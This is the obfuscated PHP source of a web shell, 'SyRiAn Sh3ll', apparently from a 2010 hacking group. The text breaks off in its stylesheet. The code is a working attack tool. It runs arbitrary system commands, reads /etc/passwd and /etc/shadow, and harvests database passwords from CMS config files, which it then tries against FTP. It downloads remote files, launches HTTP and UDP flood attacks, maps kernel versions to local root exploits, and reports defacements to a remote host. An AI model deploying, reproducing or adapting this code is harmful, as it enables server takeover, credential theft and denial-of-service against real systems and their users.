sy34[at]msn[dot]com # \___ \| _ \ / _ \ | | Note : I'm Proud to be ~~SyRiAn~~ # __ _)|| | | || __/ | | Copyright (C) 2010 - ~~ syrian-shell.com ~~ #|_ _ _/|_| |_|\___|_|_| Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ] . # $auth = 1; //user & password = vbspiders.com $name='f4a8730b5b702cb1788226c600f52b79'; $pass='f4a8730b5b702cb1788226c600f52b79'; if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="Cyber"'); header('HTTP/1.0 401 Unauthorized'); exit("Wrong Password;"); } } $iOll100oil0ioIlo = 1; $user = 'vbspiders.com'; $pass = 'vbspiders.com'; $iIi1i11l11OoIlIl = '#990000'; if($_GET['id']== 'logout') {Logout();} if(!($_GET['id'] == 'sshSession')) {echo CSS($iIi1i11l11OoIlIl);} else if($_GET['id'] == 100){echo "<\142\x6f\144\171 \157n\154o\x61\144='Suicide();'>";} else if($_GET['id'] == 'Delete'){Suicide();} function iI11i0Il0iO0iooi($file,$per) { if(function_exists('chmod')){$try = chmod($file,$per); } if(!$try){$try = Exe("\143h\x6do\144 $per $file"); } if($try){return true;} else{return false;} } function showUsers() { if($rows = Exe('cat /etc/passwd')){echo $rows;} elseif($rows= Exe('cat /etc/domainalias')){echo $rows;} elseif($rows= Exe('cat /etc/shadow')){echo $rows;} elseif($rows= Exe('cat /var/mail')) {echo $rows;} elseif($rows= Exe('cat /etc/valiases')) {echo $rows;} elseif(file_exists('/etc/passwd')) { for($uid=0;$uid<60000;$uid++) { $iiOo1o0i00I0i0OO = posix_getpwuid($uid); if (!empty($iiOo1o0i00I0i0OO)) {while (list ($key, $iIio1oOolli0oI1l) = each($iiOo1o0i00I0i0OO)){print "$iIio1oOolli0oI1l:";}print "\n";} } } else { echo "[-] \103\x61n'\164 \x53h\x6fw Users :( ... \123\157\162r\171 ";} } function i1lOlOi0I01ooOoo($url) { while(1) { $i0o1iOil1oIoI0I1 = curl_init($url); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); $do = curl_exec($i0o1iOil1oIoI0I1); curl_close($i0o1iOil1oIoI0I1); flush(); } echo "[+] D\104\x4f\123 A\x74t\x61\143k H\141s \104\157\156\x33 ."; return true; } function iOIilO1iIolIl11l($url) { $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); for($i=0;$i<65000;$i++){$i00oiiolO100I10o .= 'X'; } while(1) { $packets++; $rand = rand(1,65000); $i10Oi1lOO10I1OoI = fsockopen('udp://'.$url, $rand, $il1Oi1OoO11I1OiI, $i1Oli10olOiIlloI, 5); if($i10Oi1lOO10I1OoI){fwrite($i10Oi1lOO10I1OoI, $i00oiiolO100I10o); fclose($i10Oi1lOO10I1OoI);} } echo "\125\x44\x50 \106l\157\157\144 : Com\x70\x6ce\x74e\144 \x77it\x68 $packets (" . round(($packets*65)/1024, 2) . " M\x42) packets a\166\x65r\x61gin\x67\n"; } function iiIolll1o11oIOll($os) { if($os == "\114\151\156\x75\170"){$iiIolll1o11oIOll = Exe('ls -lia');} else if ($os == "Windows"){$iiIolll1o11oIOll = Exe('dir');} if($iiIolll1o11oIOll){echo $iiIolll1o11oIOll;} else if(function_exists('opendir')) { if ($i10Ol0oo0Oo1Ii0I = opendir(getcwd())) { while (false !== ($file = readdir($i10Ol0oo0Oo1Ii0I))){echo "$file\n";} while ($file = readdir($i10Ol0oo0Oo1Ii0I)){echo "$file\n";} closedir($i10Ol0oo0Oo1Ii0I); } } else { $d=dir(getcwd()); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; clearstatcache(); list ($il1Ii0l0oilIoO1i, $i1oo1oi0oilOIiO1, $iO0Ol010oll1IolI, $ioOi11OO101OIiOo, $uid, $iO10i11lli0Iol1o, $iOi11OlOloo0I0ol, $size, $il0l1OoliOI0101l, $iI1oi10ooOiiIi1O, $i10ol11il0Ilii11, $il10i0iO0lIOiilO) = stat($file); if($windows) {echo date("d.\x6d.\131 H:i",$iI1oi10ooOiiIi1O);if(is_dir($file)) echo " <\x44\x49\x52> "; else printf("% 7s ",$size);} else { $owner = posix_getpwuid($uid); $iOo0111l1llIloOI = posix_getgrgid($iO10i11lli0Iol1o); echo $i1oo1oi0oilOIiO1." "; echo perms(fileperms($file)); printf("% 4d % 9s % 9s %7s ",$ioOi11OO101OIiOo,$owner['name'],$iOo0111l1llIloOI['name'],$size); echo date("d.\155.\131 H:i ",$iI1oi10ooOiiIi1O); }echo "$file\n"; }$d->close(); } } } function iloOl1lloloI1loI($fileURL) { $i10010oOiOOllIi0 = Exe('get '.$fileURL); if(!$i10010oOiOOllIi0){$i0iliOooiOOolIio = Exe('wget '.$fileURL);} elseif(!$i0iliOooiOOolIio){$iOol10O0lo0loII1 = Exe('curl -o '.$fileURL);} elseif(!$iOol10O0lo0loII1){$iO0lloO0l01OOI11 = Exe('lynx -source '.$fileURL);} if(!$iO0lloO0l01OOI11 && function_exists('file_get_contents') && function_exists('fwrite')) { $ioil11lioiiIO001 = file_get_contents($fileURL); iii0li0iIOii1III('newRemoteFile',$ioil11lioiiIO001); } } function iioiio0iiI0loioo($file) { $il01l10iOoliIioO = fopen($file,'r'); if(function_exists('fread')){echo fread($il01l10iOoliIioO,100000); } elseif(function_exists('fgets')){echo fgets($il01l10iOoliIioO);} elseif(function_exists('readfile')){echo readfile($il01l10iOoliIioO);} elseif(function_exists('file_get_contents')) {$ilIIl11oiOllIol1 = file_get_contents($file, NULL, NULL, 0, 1000000);var_dump($ilIIl11oiOllIol1);} else if(!is_dir(dirname(__FILE__)."/\150t\x74\x70:")) { if(!is_writable(dirname(__FILE__))) echo "\x49 c\141n'\164 \x63\162\x65\141\164e \150\164\164p:directory"; else { mkdir("\x68\164t\160:"); if(get_magic_quotes_gpc() == 1){$file = stripslashes($_POST['file']);} else{$file=$_POST['file'];} if((curl_exec(curl_init("\146\151\x6ce:ht\164p://../".htmlspecialchars_decode($file)))) and !empty($file)) die(); elseif(!empty($file)) die("\x53\x6frry... \x46\151\x6ce ".htmlspecialchars($file)." d\x6fe\x73\x6e'\x74 \145\170i\163ts \x6fr \171\x6f\x75 \x64\x6f\156'\x74 h\141v\145 \x70e\162\x6d\151\x73si\x6f\x6es."); } } elseif(function_exists('file')) { $ilIIl11oiOllIol1 = file($file); foreach ($ilIIl11oiOllIol1 as $io1olo1i0loOI0O0 => $iioi1li0110oIl10) { echo $iioi1li0110oIl10 . " "; } } elseif(function_exists('copy')) { $tmp=tempnam('','cx'); copy('compress.zlib://'.$file,$tmp); $iii01iollOOIoo0l=fopen($tmp,'r'); $data=fread($iii01iollOOIoo0l,filesize($tmp)); fclose($iii01iollOOIoo0l); echo $data; } elseif(function_exists('mb_send_mail')) { if(file_exists('/tmp/mb_send_mail')){DeleteFile('/tmp/mb_send_mail');} mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail'); readfile('/tmp/mb_send_mail'); } else if(function_exists('curl_init')) { $i0o1iOil1oIoI0I1 = curl_init("\146i\x6c\145://".$file."\x00".__FILE__); var_dump(curl_exec($i0o1iOil1oIoI0I1)); } else if(is_object($il1ii0olO010oIll=new COM('WScript.shell'))){echo $exec=i1OO11Ol00IOo0l1("type '$file'",$il1ii0olO010oIll);} else if(i11Ii10o0oIli1I1('win_shell_execute')){echo i0lI1o0loo0ooI1i("type '$file'");} else if(i11Ii10o0oIli1I1('win32_create_service')){echo i0iliil1ii1iIOlo("type '$file'");} else if(function_exists('imap_open') && ($file == '/etc/passwd')) { $i00O1OOOo000OIiI=imap_open('/etc/passwd','',''); $list=imap_list($i00O1OOOo000OIiI,$file,'*'); for($i=0;$i1){$list=imap_list($i00O1OOOo000OIiI,trim($s[0]),trim($s[1]));} else {$list=imap_list($i00O1OOOo000OIiI,trim($i00O1OOOo000OIiI[0]),'*');} for($i=0;$i= 4){break;} if($iioIiOli00iI0Ilo[$i] == ' '){$iIO0l1i0OiIloO1I++;} if($iIO0l1i0OiIloO1I == 3){if($iioIiOli00iI0Ilo[$i] == " "){}else {$iioIi0ilOloII01o .= $iioIiOli00iI0Ilo[$i];}} }return $iioIi0ilOloII01o; } function i0olili01oiIl1Io($login,$pass) { $ftp=ftp_connect('127.0.0.1'); if ($ftp) { $i0IoililO0ooIl01=ftp_login($ftp,$login,$pass); if ($i0IoililO0ooIl01) { echo '[FTP] '.$login.':'.$pass." S\165\x63\143e\163\x73\n"; } else ftp_quit($ftp); } } function il0oll1olll0Io1l($path,$username) { if ($i10Ol0oo0Oo1Ii0I = opendir($path)) { while (false !== ($file = readdir($i10Ol0oo0Oo1Ii0I))) { $i1II1llooliIIi00="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($i1II1llooliIIi00)) { $i0lll0l11OoI0IOl="$i1II1llooliIIi00/"; if (is_dir($i0lll0l11OoI0IOl)) { il0oll1olll0Io1l($i0lll0l11OoI0IOl,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=i111l1lliOlIOoIo($i1II1llooliIIi00); if ($pass!='') { echo "[+] $i1II1llooliIIi00\n$pass\n"; i0olili01oiIl1Io($username,$pass); } } } } } } } } function i111l1lliOlIOoIo($link) { $config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ill0iiioI0III0I0() { if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);} elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);} else {$ip=getenv(REMOTE_ADDR);} return $ip; } function i0oO11oioOiOIiil() { $i0oO11oioOiOIiil = ini_get("\x6fp\x65n_\142as\x65\x64\x69\x72"); if (!$i0oO11oioOiOIiil){$i0oO11oioOiOIiil = 'OFF';} else {$i0oO11oioOiOIiil = 'ON';} return $i0oO11oioOiOIiil; } function iIl1l0O0ooOO1IOI($string) { $hex=''; for ($i=0; $i < strlen($string); $i++){$hex .= dechex(ord($string[$i]));}return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode){$safe_mode = 'OFF';} else {$safe_mode = 'ON';} return $safe_mode; } function i01oiOo00oiIl1Io() { $i01oiOo00oiIl1Io = $_SERVER["\x53\x43\x52IP\124_\116\x41M\x45"]; $i01oiOo00oiIl1Io = Explode('/', $i01oiOo00oiIl1Io); $i01oiOo00oiIl1Io = $i01oiOo00oiIl1Io[count($i01oiOo00oiIl1Io) - 1]; return $i01oiOo00oiIl1Io; } function Suicide() {DeleteFile(i01oiOo00oiIl1Io());} function iIoii11ioiOOIoI1() { $v=php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $iI1oio1lOoo0I1oI=>$x)if(strstr($v,$iI1oio1lOoo0I1oI))return $x; if(!$iiiiiOOi0ololIOI)$iiiiiOOi0ololIOI='Not found.'; return $iiiiiOOi0ololIOI; } function PostgreSQL() { if(function_exists('pg_connect')){$postgreSQL = 'ON';} else {$postgreSQL = 'OFF';}return $postgreSQL; } function Oracle() { if(function_exists('ocilogon')){$oracle = 'ON';} else {$oracle = 'OFF';}return $oracle; } function i1ol1ilOlIoIOOII($url, $hacker, $hackmode,$i0OIlil10ooiI0Io, $site ) { $iI1oio1lOoo0I1oI = curl_init(); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_URL, $url); curl_setopt($iI1oio1lOoo0I1oI,CURLOPT_POST,true); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_POSTFIELDS,"d\x65f\x61c\145r=".$hacker."&do\155ai\1561=". $site."&hackmode=".$hackmode."&\x72\145\141\x73o\156=".$i0OIlil10ooiI0Io); curl_setopt($iI1oio1lOoo0I1oI,CURLOPT_FOLLOWLOCATION, true); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_RETURNTRANSFER, true); $ilIOioilO0O1IO1i = curl_exec($iI1oio1lOoo0I1oI); curl_close($iI1oio1lOoo0I1oI);return $ilIOioilO0O1IO1i; } function MsSQL() { if(function_exists('mssql_connect')){$msSQL = 'ON';} else {$msSQL = 'OFF';}return $msSQL; } function il0iiOOoiIOOioil() { $ioIIiioOOl1lIi1I = function_exists('mysql_connect'); if($ioIIiioOOl1lIi1I){$mysql = 'ON';} else {$mysql = 'OFF';}return $mysql; } function iilI11l1o01IilIo($ScriptType) { if($ScriptType == 'vb'){return "/\x69\156c\x6c\165\x64\145\x73/config.\x70\x68\x70";} elseif($ScriptType == 'wp'){return "/\167\160-config.\160\150p";} elseif($ScriptType == 'phpbb'){return "/config.p\x68p";} elseif($ScriptType == 'jos'){return "/\x63\157\156\x66\x69\x67\x75\x72a\x74i\x6fn.\160\150\x70";} elseif($ScriptType == 'ipb'){return "/\143o\x6e\146_\x67\154\x6f\x62\x61\154.p\150\x70";} elseif($ScriptType == 'smf'){return "/\123\145\x74\164\151\156\147s.\x70\x68\160 ";} elseif($ScriptType == 'mybb'){return "/\x69\156\143/config.\x70\150\x70 ";} } function Gzip() { if (function_exists('gzencode')){$gzip = 'ON';} else {$gzip = 'OFF';}return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')){$mysqli = 'ON';} else {$mysqli = 'OFF';}return $mysqli; } function MSQL() { if (function_exists('msql_connect')){$mSql = 'ON';} else {$mSql = 'OFF';}return $mSql; } function iiIi1OiO1IlIOIi1() { if (function_exists('sqlite_open')){$iiIi1OiO1IlIOIi1 = 'ON';} else {$iiIi1OiO1IlIOIi1 = 'OFF';}return $iiIi1OiO1IlIOIi1; } function iilolol00IilOo1I() { if(ini_get('register_globals')){$iO0Oilioli1iI1Ii= 'ON';} else{$iO0Oilioli1iI1Ii= 'OFF';}return $iO0Oilioli1iI1Ii; } function i1iI1iliIoI0oOOi($size) { if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " \x47\x42";} elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " M\102";} elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " \113\x42";} else {$size = $size . " B";}return $size; } function Curl() { if(extension_loaded('curl')){$curl = 'ON';} else{$curl = 'OFF';}return $curl; } function iioO1iiiOOoIi1l0($scriptType) { if(file_exists('DecryptConfig.php')) { include("\x44\145c\x72\x79\x70\164\x43\x6fn\146\151\147.\160\x68p"); if($scriptType == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $iO0olioOo0O0I1IO = $config['Misc']['modcpdir']; } elseif($scriptType == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($scriptType == 'jos') { $dbName = $db; $prefix = $ioOlioolio0IIoOo; $email = $i10olOl1io10IOll; $host = $host; $user = $user; $pass = $password; } elseif($scriptType == 'phpbb') { $host = $ioill00lo0lI1l1o; $port = $i1o1lOOi0liIllIo; $dbName = $dbname; $user = $ioO0i0O11OlIOlO1; $pass = $ioioiO0lo1OI1iiO; $prefix = $table_prefix; } elseif($scriptType == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($scriptType == 'smf') { $dbName = $db_name; $pass = $iol1iO0Oli0IlOI1; $prefix = $iOool0o011iI0OIO; $host = $iOI1l0oiO0OI0l0o; $user = $db_user; $email = $iiool000ii1lOIli; } elseif($scriptType == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$iO0olioOo0O0I1IO.' '; } else{echo "F\x69l\x65 De\143\x72y\160t\103o\x6e\146i\147.ph\x70 \116\157t \x45\x78\151s\x74\x73 !! ";} } function ilI1iii00OiI00I1() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function iOIllOOoi1li1IOi() { $i1l0i000ll0o1I1O=ini_get('upload_tmp_dir'); $iO1llOo01oll1IO0=getenv('USERPROFILE'); $io1o1o0ol0IO0011=getenv('ALLUSERSPROFILE'); $i10Oliii0liiI0Io=ini_get('session.save_path'); $ioil1i0O00lIOoI1=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($iO1llOo01oll1IO0) && is_writable($iO1llOo01oll1IO0))return $iO1llOo01oll1IO0; if(is_dir($io1o1o0ol0IO0011) && is_writable($io1o1o0ol0IO0011))return $io1o1o0ol0IO0011; if(is_dir($i10Oliii0liiI0Io) && is_writable($i10Oliii0liiI0Io))return $i10Oliii0liiI0Io; if(is_dir($i1l0i000ll0o1I1O) && is_writable($i1l0i000ll0o1I1O))return $i1l0i000ll0o1I1O; if(is_dir($ioil1i0O00lIOoI1) && is_writable($ioil1i0O00lIOoI1))return $ioil1i0O00lIOoI1; return '.'; } function i0lI1o0loo0ooI1i($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function update() {echo "[+] U\x70\x64\141\x74\145 \x48a\163 \104\x30\156\x33 ^_^";} function i0iliil1ii1iIOlo($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/\143 $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function iIlol10lO11Ii0Ol($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); $iIl0loOO1lIoi00o=new ffi("[\154\x69b='ke\x72\x6e\x65\x6c\x33\062.\144ll'] i\156\164 WinExec(c\150a\162 *A\120P,\x69\x6et \x53\x57);"); $i0IoililO0ooIl01=$iIl0loOO1lIoi00o->WinExec("cmd.\x65\x78\x65 /\143 $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function i1OO11Ol00IOo0l1($command,$il1ii0olO010oIll) { $exec=$il1ii0olO010oIll->exec("cmd.\145x\145 /\143 $command"); $so=$exec->StdOut(); return $so->io00iOOlOI0ollI1(); } function iO0Illo1lO0lIoIl($command) { $perl=new perl(); ob_start(); $perl->eval("s\171s\164\x65m('".$command."')"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $iiOl10io00iI1o0i[]=array('pipe','r');$iiOl10io00iI1o0i[]=array('pipe','w'); if(function_exists('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=shell_exec($command); elseif(function_exists('popen')){$i10Oi1lOO10I1OoI = popen($command,"\x72"); {$result = "";while(!feof($i10Oi1lOO10I1OoI)){$result.=fread($i10Oi1lOO10I1OoI,1024);}pclose($i10Oi1lOO10I1OoI);} $exec = convert_cyr_string($result,"d","\x77");} elseif(function_exists('proc_open')){$i0IoililO0ooIl01=proc_open($command,$iiOl10io00iI1o0i,$ilOIi1011iloIl1I);while(!feof($ilOIi1011iloIl1I[1])){$line=fgets($ilOIi1011iloIl1I[1]);$output.=$line;}$exec=$output;proc_close($i0IoililO0ooIl01);} elseif(function_exists('win_shell_execute'))$exec=i0lI1o0loo0ooI1i($command); elseif(function_exists('win32_create_service'))$exec=i0iliil1ii1iIOlo($command); elseif(extension_loaded('ffi') && $windows)$exec=iIlol10lO11Ii0Ol($command); elseif(extension_loaded('perl'))$exec=iO0Illo1lO0lIoIl($command); return $exec; } function illolO1llo0iIi1l() { if(function_exists('get_magic_quotes_gpc')){$iOillO11lOO0I1I0 = get_magic_quotes_gpc();} if (empty($iOillO11lOO0I1I0)){$iOillO11lOO0I1I0 = 'OFF';} else {$iOillO11lOO0I1I0= 'ON';}return $iOillO11lOO0I1I0; } function DisableFunctions() { $ioli1OloillI0iOi = ini_get('disable_functions'); if (empty($ioli1OloillI0iOi)){$ioli1OloillI0iOi = 'NONE';}return $ioli1OloillI0iOi; } function i0IilOl1iIl0llOi($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function iii0li0iIOii1III($name,$content) { $file = fopen($name,"w+"); if($file) { $iII1lOolO0o1oIi0 = fwrite($file,$content); if(!$iII1lOolO0o1oIi0){return false;} } else{return false;} fclose($file); return true; } function which($ioi1i110o00OIoio) { $path = Exe("which $ioi1i110o00OIoio"); if(!empty($path)) { return trim($path); } else {return trim($ioi1i110o00OIoio);} } function i11Ii10o0oIli1I1($ili1i1l011oIIIIl) { global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open'); if($safemode=='ON' && in_array($ili1i1l011oIIIIl,$safe))return 0; elseif(function_exists($ili1i1l011oIIIIl) && is_callable($ili1i1l011oIIIIl) && !strstr($disablefunctions,$ili1i1l011oIIIIl))return 1; return 0; } function CSS($iIi1i11l11OoIlIl) { $css = " <\164\x69\164le>S\x79\122\x69\101\x6e Sh\x33\154\154 ~ \x56\065.6~ [ B\x33 \x43r3\064\x54!V\063 \x4fr \104!3 T\x52\171!\156G ] <\154\151n\153 \x72e\154=\"s\150or\x74\143u\164 \151c\x6f\x6e\" \x68\x72\145\x66='h\164\164p://\x73y\x72\x69a\156-shell.\x63\x6f\155/\164i\x74\154e.\147i\146' /> B\117\x44\x59 { \106\117N\124-\106A\115\x49L\x59: \x56e\x72da\x6e\x61; m\141rgin: 2; \143ol\x6fr: #c\143\x63\143\143\143; \142\x61\143\153\x67\x72\157\x75n\144-\x63\x6f\x6c\157\x72: #000000; } sy { \143o\154\157\162:".$iIi1i11l11OoIlIl."; \x66on\x74-size:7\160t; \x66on\x74-w\145\x69\147h\164: \142o\154\144; } #Box { \143\x6f\154\157r:".$iIi1i11l11OoIlIl."; \146on\164-size:14\x70\x78; \142\x61\143k\x67\x72\157\165\x6e\144-\x63olor:#000; \x66\157\156t-\x77e\151\x67\x68\164:\x62ol\x64; } \164\162 { B\117\x52\104\105\122-\x52\x49\x47\110\x54: #cc\x63c\143c 1\160\170 \x73o\x6c\151\144; B\x4f\x52\x44\x45\x52-\124\x4f\120: #\x63\143\143\x63\143\x63 1\x70\x78 \163\x6fl\x69\144; \102O\x52\x44ER-\x4cE\106\x54: #\143\143ccc\143 1px \163\x6f\x6c\151\x64; B\117RD\x45\x52-\102\117T\x54\117\115: #\x63\x63\143\x63\x63\143 1\160\170 \x73\x6f\x6c\x69\x64; c\157l\x6f\162: #\146\146\146\146\146f; } \x74\144 { B\117\x52\104\105R-\x52\111\107H\124: #\143c\143\x63\143\x63 1\x70\170 s\x6f\x6c\151\144; B\117R\104\x45R-\x54\x4f\120: #\143c\x63\143\143\143 1p\x78 \x73o\154\151d; \102\117\122\x44\105R-L\x45\x46\124: #\x63\143\x63\143\x63\143 1\160x \163\157\x6c\151d; B\x4fR\x44\x45R-\x42\117\x54\x54\117\x4d: #\143\143\x63c\143\143 1px \163\157\154id; \143\x6fl\x6f\x72: #\x63\143\x63\143\x63\x63; } .\x74\x61\x62l\145\061 { \x42\117\x52\x44\x45\x52: 1\x70\170 n\157ne; \x42A\x43\113\107RO\125\116\x44-C\117\x4c\117\x52: #000000; c\x6fl\157\x72: #333333 } .\x74d1 { B\x4f\122\x44E\x52: 1\160\x78 \156o\156e; co\x6c\x6f\162: #\x66\146\x66\x66\146\146; f\x6f\156\x74-\163\x74\x79\154\x65:\156o\x72\155a\154; font-v\141r\x69\x61nt:\156o\162\x6dal; f\x6f\x6e\x74-w\145i\147\x68t:\x6e\157\162m\141\154; f\x6f\x6e\x74-size:7\160\164; \146\157nt-\146am\x69\x6c\x79:\164ah\x6fma } .\x74\162\x31 { \102O\122\x44E\122: 1p\170 \156on\x65; co\x6c\x6f\x72: #\143\143\143\143\x63\143; } ta\x62le { \102\117R\x44ER: #e\x65e\145\145\145 out\163e\x74; BA\x43K\x47\x52\117\x55\x4e\104-CO\114\x4fR: #000000; \x63\x6f\154\157r: #\x63\143\x63ccc; } input { B\117\122D\x45\x52-R\111\107\x48T: ".$iIi1i11l11OoIlIl." 1\x70\170 \x73\x6f\154\151d; B\117\x52\104ER-\x54\117P: ".$iIi1i11l11OoIlIl." 1\160\x78 s\157\154i\x64; \x42\x4f\122\104\105\x52-\x4c\105FT: ".$iIi1i11l11OoIlIl." 1\160\x78 \x73\157\x6ci\x64; \102\x4fRD\105\122-\102\x4f\124T\x4f\x4d: ".$iIi1i11l11OoIlIl." 1p\x78 \x73\x6f\x6c\151\x64; BA\x43K\x47\122OU\x4eD-C\117\x4cO\x52: #333333; \146ont: 9p\x74 \164\x61\x68\157m\141; \143o\154o\162: #\x66f\146f\146f; } s\145l\145\143\164 { BO\x52\x44\x45\122-R\111\x47HT: #\146\x66\146\146\146f 1\160x \163\x6f\154\x69\x64; \102\x4f\x52DE\122-TOP: #999999 1\160x \x73oli\x64; \x42OR\104E\122-\114EFT: #999999 1px s\157l\x69d; B\x4fR\104\x45\x52-\x42\117\x54\124\x4fM: #\x66\146\x66f\x66f 1\x70\170 \x73\157\154\x69d; \102\101C\x4bGR\117UN\x44-\103\x4f\x4c\117R: #000000; \x66\x6fn\164: 9\x70t \164\141h\x6f\155a; \x63\x6f\x6c\x6f\x72: #\x43\x43C\x43\x43\x43;; } submit { \102O\x52\104\105\x52: 1p\x78 o\165t\163\145t \x62u\x74\x74\157\156hig\150\x6c\151\147\x68\x74; BAC\113\x47\x52OU\116\104-\103O\x4cOR: #272727; \167\x69\144t\x68: 40%; col\x6f\x72: #\143c\x63\143\x63\x63; } tex\x74a\x72\145a { \x42\x4fR\x44ER-R\x49\x47H\124: #\x66\146\146fff 1\160\170 \163\157\154\x69\144; \x42O\122\x44\x45\122-\x54\x4f\x50: #999999 1\160x \x73o\x6c\151d; \x42\x4f\122\x44\x45\122-L\105\x46\x54: #999999 1\160\170 sol\x69\x64; \x42\117\x52\x44\105\122-\x42\117\124\x54OM: #f\146\x66f\146f 1\160x \x73ol\x69\x64; \102\101\x43\x4bGROUN\x44-\x43\x4f\x4c\117\x52: #333333; co\x6c\157\x72: #\146\146\146\146\146\146; } \x41:\x6ci\x6e\x6b 